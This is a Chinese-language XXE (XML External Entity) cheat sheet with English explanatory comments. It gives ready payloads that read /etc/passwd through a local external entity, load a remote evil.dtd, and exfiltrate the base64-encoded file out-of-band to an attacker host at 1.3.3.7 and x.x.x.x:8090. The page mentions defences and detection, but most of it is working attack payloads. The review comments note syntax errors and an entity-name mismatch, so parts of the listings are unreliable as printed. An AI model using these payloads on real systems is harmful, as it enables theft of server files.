
XML External Entity

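DTD(Document Type Definition,文档类型定义):声明 XML 文档的结构与实体。XXE 源于解析器在处理 DTD 时解析外部实体;防御上应在解析器中禁止 DOCTYPE 声明,或至少禁用外部实体与外部 DTD 的加载。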

基本操作(外部实体读取本地文件):

<?xml version="1.0" ?>
<!-- Minimal XXE illustration: the internal DTD subset declares an external
     general entity and the document body references it. -->
<!DOCTYPE a [
    <!-- "content" is an external entity whose SYSTEM identifier is a file:// URI;
         a parser that resolves external entities reads that local file. -->
    <!ENTITY content SYSTEM "file:///etc/passwd">]>
<!-- The reference below is replaced with the entity's content at parse time.
     A parser configured to reject DOCTYPE declarations, or to not load
     external entities, does not perform the file read. -->
<value>&content;</value> 

外部引入(通过参数实体加载远程 DTD):

<?xml version="1.0" ?>
<!-- Variant that takes its entity declarations from a remote DTD instead of
     declaring them inline. -->
<!DOCTYPE a [
    <!-- Parameter entity "d" has an http:// SYSTEM identifier; resolving it
         makes the parsing host fetch that URL. -->
    <!ENTITY % d SYSTEM "http://example.com/evil.dtd">
    <!-- Referencing the parameter entity includes the fetched declarations
         in this DTD. -->
    %d;
]>
<!-- General entity "b" is not declared in this document itself; it would have
     to come from the fetched DTD. NOTE(review): the evil.dtd listing on this
     page declares "d", not "b"; confirm which name is intended. -->
<value>&b;</value>

evil.dtd:

<!-- Content of the remotely hosted DTD: declares general entity "d" as an
     external entity with a file:// SYSTEM identifier. -->
<!ENTITY d SYSTEM "file:///etc/passwd">

向外发送(带外回传;解析器所在主机会主动发起出站 HTTP 请求,可通过出站流量监控与出口过滤来检测和阻断):

<?xml version="1.0" ?>
<!-- Out-of-band variant: the document declares only the parameter entity "sp";
     "param1" and "exfil" are not declared here and presumably come from the
     DTD fetched through "sp" (see the xxe.dtd listing on this page). -->
<!DOCTYPE r [
<!ELEMENT r ANY >
<!-- NOTE(review): as printed there is no whitespace between SYSTEM and the
     quoted literal, which the XML grammar requires. A strict parser rejects
     this listing before any entity handling, so a parse error on this input
     is not evidence that external entities are disabled. -->
<!ENTITY % sp SYSTEM"http://1.3.3.7:8000/xxe.dtd">
%sp;
%param1;
]>

<!-- Resolving this reference triggers a second outbound request from the
     parsing host; both requests are visible to egress filtering and
     outbound-connection logging. -->
<r>&exfil;</r>

xxe.dtd:

<!-- Content of the remotely hosted DTD used by the out-of-band variant.
     "data" uses the php://filter stream wrapper with convert.base64-encode,
     so it is only meaningful when the XML parser runs inside PHP.
     The replacement text of "param1" is itself an entity declaration whose
     SYSTEM URL embeds the value of "data".
     NOTE(review): as printed, whitespace is missing after SYSTEM and after
     the ENTITY keyword inside the replacement text; confirm against the
     original listing. -->
<!ENTITY % data SYSTEM"php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITYexfil SYSTEM 'http://x.x.x.x:8090/?%data;'>">